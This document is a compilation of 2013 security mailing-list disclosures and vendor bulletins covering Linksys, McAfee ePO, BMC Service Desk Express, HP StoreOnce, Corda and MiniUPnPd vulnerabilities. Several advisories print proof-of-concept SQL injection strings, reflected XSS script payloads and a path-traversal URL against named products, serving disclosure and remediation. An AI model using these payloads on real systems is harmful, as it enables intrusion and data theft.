CVE-2013-3568 - Linksys CSRF + Root Command Injection
Hi list, I would like to inform you that the latest available Linksys WRT110 firmware is prone to root shell command injection via cross-site request forgery. This vulnerability is the result of the web interface's failure to sanitize ping targets as well as a lack of csrf tokens. Linksys/Belkin has responded to my report to say that the vulnerability is mitigated by a 10 minute idle-timeout feature which is available for the admin portal on this device. It is likely that other devices with similar firmware are prone to this as well. The command execution will not return output but it is possible to direct output into files which are available upon subsequent HTTP requests. This issue was assigned as CVE-2013-3568. Kind Regards, Craig Young (@CraigTweets)
Re: Windows 7/8 admin account installation password stored in the clear in LSA Secrets
Hi, I've often found this behaviour during security assessments for corporate Clients. It should indeed be considered a vulnerability, especially in enterprise scenarios where for instance it can be leveraged by a regular notebook user to escalate privileges and be able to access all other corporate user's notebooks (including their bosses';). Cheers, MI On Thu, 11 Jul 2013, Dnegel X. wrote: 1. I didn't find an explanation about this behavior that deals with installation password, although this LSA Secret is well known to contain passwords, mainly from Windows XP era. Could you provide a link? It also hasn't been fixed in Window 8 released this year. 2. You could e.g. retrieve a password from one vulnerable machine (where physical access or admin shell is possible) and use it against more secure ones sharing same admin password, typically when a Windows image is replicated over a network to multiple machines. Anyhow, having a cleartext password residue somewhere without documentation looks like a sad bug to me. Xavier On Thu, Jul 11, 2013 at 7:35 PM, Rob sy...@synfulvisions.com wrote: Two things: 1. This was made public sometime in 2012 or earlier IIRC. 2. Exploiting this requires the same permission levels that would be required to change or access the password anyway. Where's the realistic security threat? Rob -- -- Marco Ivaldi OPSA, OPST, OWSE, QSA, ASV Senior Security Advisor @ Mediaservice.net SrlTel: +39-011-32.72.100 Via Santorelli, 15Fax: +39-011-32.46.497 10095 Grugliasco (TO) - ITALY http://www.mediaservice.net/ -- PGP Key - https://keys.mediaservice.net/m_ivaldi.asc
Multiple vulnerabilities in McAfee ePO 4.6.6
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in McAfee ePO 4.6.6 Affected Product: McAfee ePO 4.6.6 Build 176 (potentially) earlier versions Timeline: 08 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 12 June 2013 - Vendor replied/confirmed opened service ticket 12 July 2013 - Vendor responded with dates for solutions Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) CVE: To be assigned NCIRC ID: NCIRC-2013127-01 Description: Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication. Vulnerability Details: 1. SQL injection a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computeruid= 6waitf or%20delay'0%3a0%3a20'-- index=0datasourceID=orion.user.security.token=2LoWTAOfWJ4ZCjxYajax Mode=standard HTTP/1.1 b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer uid=1;%20WAITFOR%20DELAY%20'0:0:0';-- datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query Factory %3Aquery.2index=0 HTTP/1.1 McAfee Solution: Item a will be addressed in ePO 4.6.7 due out in late Q3 2013. Item b has been addressed per Security Bulletin SB10043. (https://kc.mcafee.com/corporate/index?page=3Dcontentid=3DSB10043) 2. Reflected XSS a. POST /core/loadDisplayType.do HTTP/1.1=20 displayType=text_lookupoperator=eqpropKey=EPOLeafNode.AgentVersionins tanceId=scriptalert(182667)/scriptorion.user.security.token=ZCFbpCp y3ldihsCWajaxMode=standard b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=text_lookupoperator=eqpropKey=EPOLeafNode.AgentVersionins tanceId=scriptalert(182667)/scriptorion.user.security.token=ZCFbpCp y3ldihsCWajaxMode=standard c. POST /console/createDashboardContainer.do HTTP/1.1 elementId=3DcustomURL.dashboard.factory%3Ainstanceindex=3D2pageid=3D30 width=3D1118height=3D557refreshInterval=3D5refreshIntervalUnit=3DMIN filteringEnabled=3Dfalsemo nitorUrl=3Dhttp%3A%2F%2Fwww..com//iframescriptalert(111057)/s criptorion.user.sec urity.token=3D9BslgbJEv2JqQy3kajaxMode=3Dstandard d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1;/scriptscriptalert(147981 )/scriptorion.user.security.token=ZCFbpCpy3ldihsCWajaxMode=standard HTTP/1.1 e. GET /ComputerMgmt/sysDetPanelQry.do?uid=scriptalert(149031)/scriptorion .user.security.token=ZCFbpCpy3ldihsCWajaxMode=standard HTTP/1.1 f. GET /ComputerMgmt/sysDetPanelQry.do?uid='scriptalert(30629)/scriptor ion.user.security.token='scriptalert(30629)/scriptajaxMode=' scriptalert(30629)/script HTTP/1.1 g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=scriptalert(146243)/scripto rion.user.security.token=ZCFbpCpy3ldihsCWajaxMode=standard HTTP/1.1 h. GET /ComputerMgmt/sysDetPanelSummary.do?uid='scriptalert(30565)/script orion.user.security.token='scriptalert(30565)/scriptajaxMode= 'scriptalert(30565)/script HTTP/1.1 McAfee Solution: Each of these items will be addressed in ePO 4.6.7 due out in late Q3 2013.
Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95 Affected Product: BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95 Timeline: 07 June 2013 - Vulnerability found 12 June 2013 - Vendor informed 17 June 2013 - Vendor replied/confirmed opened service ticket Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int) CVE: To be assigned NCIRC ID: NCIRC-2013127-02 Description: Multiple vulnerabilities, including Cross-Site Scripting(XSS) and SQL injection were identified in the latest version of BMC SERVICE DESK EXPRESS Vulnerability Details: 1. SQL injection a. /SDE/DashBoardGUI.aspx vuln parameter: [ASPSESSIONIDASSRATTQ cookie] b. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_1 cookie] c. /SDE/DashBoardGUI.aspx vuln parameter: [TABLE_WIDGET_2 cookie] d. SDE/DashBoardGUI.aspx vuln parameter: [browserDateTimeInfo cookie] e. /SDE/DashBoardGUI.aspx vuln parameter: [browserNumberInfo cookie] f. /SDE/login.aspx vuln parameter: [UID] 2. Reflected XSS a. /SDE/QV_admin.aspx vuln parameter: [SelTab] b. /SDE/QV_grid.aspx vuln parameter: [CallBack] c. /SDE/commonhelp.aspx vuln parameter: [HelpPage] example: GET /SDE/QV_grid.aspx?QuerySeq=1068CondVal=1%40V1%40ADMINISTRATION%401Call Back=parent.parent.frames.TmInputs.callBack(doGridDataCallBack.arguments [0]);/scriptscriptalert(99817)/scriptViewType=gbRefresh= HTTP/1.1 Solution: No Solution has yet been provided. Please contact the vendor.
[security bulletin] HPSBST02890 rev.3 - HP StoreOnce D2D Backup System, Remote Unauthorized Access, Modification, and Escalation of Privilege
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03813919 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03813919 Version: 3 HPSBST02890 rev.3 - HP StoreOnce D2D Backup System, Remote Unauthorized Access, Modification, and Escalation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-06-26 Last Updated: 2013-07-11 Potential Security Impact: Remote unauthorized access, unauthorized modification, escalation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP StoreOnce D2D Backup System. The vulnerability could be exploited remotely resulting in unauthorized access, modification, and escalation of privilege. Please note that this issue does not affect HP StoreOnce Backup systems that are running software version 3.0.0 or newer. Devices running software version 3.0.0 or newer do not have a HPSupport user account with a pre-set password configured. References: CVE-2013-2342 (SSRT101216) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP StoreOnce D2D Backup platforms running software version 2.2.17 or older and 1.2.17 or older. HP StoreOnce D2D4324 Backup System (EH985A) HP StoreOnce D2D4312 Backup System (EH983B) HP StoreOnce D2D4312 Backup System (EH983A) HP StoreOnce D2D4112 Backup System (EH993C) HP StoreOnce D2D4112 Backup System (EH993B) HP StoreOnce D2D4106i Backup System (EH996B) HP StoreOnce D2D4106i Backup System (EH996A) HP StoreOnce D2D4106fc Backup System (EH998B) HP StoreOnce D2D4106fc Backup System (EH998A) HP StoreOnce D2D2504i Backup System (EJ002C) HP StoreOnce D2D2504i Backup System (EJ002B) HP StoreOnce D2D2502i Backup System (EJ001C) HP StoreOnce D2D2502i Backup System (EJ001B) HP D2D4112 Backup System (EH993A) HP D2D4009fc Backup System (EH942A) HP D2D4009i Backup System (EH939A) HP D2D4004fc Backup System (EH941A) HP D2D4004i Backup System (EH938A) HP D2D2504i Backup System (EJ002A) HP D2D2503i Backup System (EH945A) HP D2D2502i Backup System (EJ001A) BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2342(AV:A/AC:L/Au:S/C:C/I:C/A:C) 7.7 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com RESOLUTION HP has made the following software updates available to resolve the vulnerability. HP StoreOnce D2D Backup platforms running software version 2.2.18 or subsequent. HP StoreOnce D2D Backup platforms running software version 1.2.18 or subsequent. Customers will need to upgrade their affected HP StoreOnce Backup systems with the software update. HISTORY Version:1 (rev.1) - 26 June 2013 Initial release Version:2 (rev.2) - 8 July 2013 Software updates released and reporter acknowledgement provided Version:3 (rev.3) - 11 July 2013 Updated vulnerability impacts Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages
[Foreground Security 2013-002]: Corda Path Disclosure and XSS
Corda Path Disclosure and XSS FOREGROUND SECURITY, SECURITY ADVISORY 2013-002 - Original release date: July 12, 2013 - Discovered by: Adam Willard (Software Security Analyst at Foreground Security) - Contact: (awillard (at) foregroundsecurity (dot) com) - Severity: 4.3/10 (Base CVSS Score) I. VULNERABILITY - Corda suffers Path Disclosure in Highwire.ashx and XSS vulnerabilities II. BACKGROUND - Corda Highwire allows you to generate pdf documents Corda Server .NET Redirector version: 7.3.11.6715 allows the Web server to handle client requests for visualizations. III. DESCRIPTION - Corda Path Disclosure in Highwire.ashx Corda Redirector XSS when a file isn't found IV. PROOF OF CONCEPT - Path Disclosure Execution of a url can expose the file system directory /highwire.ashx?url=../../ XSS Execution of a similar URL allows XSS to be run as long as the Domain of the File parameter matches the domains allowed http://URL/Corda/redirector.corda/?@_FILEhttp://URL/?scriptalert('Text')/scriptiframe src=http://www.exploit-db.com/iframe@_TEXTDESCRIPTIONEN V. BUSINESS IMPACT - Discover path structure of a drive and attempt directory/file traversal An attacker could perform session hijacking or phishing attacks. VI. SYSTEMS AFFECTED - Systems implementing Corda/Domo products VII. SOLUTION - Software has been marked EOL by Domo; Highwire products no longer supported. VIII. REFERENCES - http://www.domo.com http://www.foregroundsecurity.com IX. CREDITS - This vulnerability has been discovered by Adam Willard (awillard (at) foregroundsecurity (dot) com) X. REVISION HISTORY - - July 12, 2013: Initial release. XI. DISCLOSURE TIMELINE - July 9, 2013: Issue identified within a deployed application by Adam Willard. July 9, 2013: Vulnerability discovered by Adam Willard. July 12, 2013: Contacted Vendor July 12, 2013: Vendor commented that the software is EOL with no support. July 12, 2013: Security advisory released. XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.
MiniUPnPd Information Disclosure (CVE-2013-2600)
Hi list, I am writing to inform you of an information disclosure vulnerability I noticed in MiniUPnPd a few months back. Specifically, MiniUPnPd versions 1.8 and earlier are prone to an information disclosure vulnerability due to improper use of snprintf() while preparing SSDP responses. An attacker can exploit this vulnerability by sending a crafted request with a long ST header. If the header is long enough, the SSDP response buffer will be truncated by snprintf() and the subsequent sendto() call will read off the end of the buffer thereby disclosing the contents of adjacent memory. This response can reveal details of internal network topology as well as other activity on the target network. This issue was addressed on April 26, 2013 as noted in the changelog: http://miniupnp.free.fr/files/changelog.php?file=miniupnpd-1.8.20130607.tar.gz 2013/04/26: Correctly handle truncated snprintf() in SSDP code The problem is illustrated in the following code snippet: Minissdp.c: 203 static void SendSSDPAnnounce2(int s, struct sockaddr_in sockname, 204 const char * st, int st_len, 205 const char * host, unsigned short port) 206 { 207 int l, n; 208 char buf[512]; 209 /* TODO : 210 * follow guideline from document UPnP Device Architecture 1.0 211 * put in uppercase. 212 * DATE: is recommended 213 * SERVER: OS/ver UPnP/1.0 miniupnpd/1.0 214 * */ 215 l = snprintf(buf, sizeof(buf), HTTP/1.1 200 OK\r\n 216 Cache-Control: max-age=120\r\n 217 ST: %.*s\r\n 218 USN: %s::%.*s\r\n 219 EXT:\r\n 220 Server: MINIUPNPD_SERVER_STRING \r\n 221 Location: http://%s:%u; ROOTDESC_PATH \r\n 222 \r\n, 223 st_len, st, 224 uuidvalue, st_len, st, 225 host, (unsigned int)port); 226 n = sendto(s, buf, l, 0, 227(struct sockaddr *)sockname, sizeof(struct sockaddr_in) ); 228 #if 0 //JM: Don't fill up syslog, even in error condition 229 if(n0) 230 { 231 syslog(LOG_ERR, sendto: %m); 232 } 233 #endif 234 } Notice that the sendto on line 226 is using the snprintf return value, l, from line 215 without considering whether l sizeof(buf) as is the case when the buffer is truncated. It is important to remember that snprintf() does not return the number of bytes written into the buffer but rather the number of bytes requested to be written into the buffer. Kind Regards, Craig Young @CraigTweets
Re: MiniUPnPd Information Disclosure (CVE-2013-2600)
On Fri, Jul 12, 2013 at 2:16 PM, cyo...@tripwire.com wrote: ... This issue was addressed on April 26, 2013 as noted in the changelog: http://miniupnp.free.fr/files/changelog.php?file=miniupnpd-1.8.20130607.tar.gz 2013/04/26: Correctly handle truncated snprintf() in SSDP code The problem is illustrated in the following code snippet: Minissdp.c: 203 static void SendSSDPAnnounce2(int s, struct sockaddr_in sockname, 204 const char * st, int st_len, 205 const char * host, unsigned short port) 206 { 207 int l, n; 208 char buf[512]; 209 /* TODO : 210 * follow guideline from document UPnP Device Architecture 1.0 211 * put in uppercase. 212 * DATE: is recommended 213 * SERVER: OS/ver UPnP/1.0 miniupnpd/1.0 214 * */ 215 l = snprintf(buf, sizeof(buf), HTTP/1.1 200 OK\r\n 216 Cache-Control: max-age=120\r\n 217 ST: %.*s\r\n 218 USN: %s::%.*s\r\n 219 EXT:\r\n 220 Server: MINIUPNPD_SERVER_STRING \r\n 221 Location: http://%s:%u; ROOTDESC_PATH \r\n 222 \r\n, 223 st_len, st, 224 uuidvalue, st_len, st, 225 host, (unsigned int)port); 226 n = sendto(s, buf, l, 0, 227(struct sockaddr *)sockname, sizeof(struct sockaddr_in) ); 228 #if 0 //JM: Don't fill up syslog, even in error condition 229 if(n0) 230 { 231 syslog(LOG_ERR, sendto: %m); 232 } 233 #endif 234 } Notice that the sendto on line 226 is using the snprintf return value, l, from line 215 without considering whether l sizeof(buf) as is the case when the buffer is truncated. Truncation occurs at l = sizeof(buf) since because of the terminating NULL. Jeff